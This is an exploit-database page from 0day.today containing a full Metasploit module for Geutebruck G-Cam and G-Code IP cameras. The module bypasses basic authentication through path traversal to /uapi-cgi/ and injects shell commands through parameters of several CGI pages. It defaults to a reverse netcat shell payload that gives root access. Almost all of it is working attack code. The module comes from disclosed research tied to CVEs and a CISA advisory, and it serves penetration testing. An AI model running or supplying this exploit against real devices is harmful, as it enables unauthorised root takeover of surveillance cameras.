0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Geutebruck Remote Command Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end # 0day.today [2024-09-28] #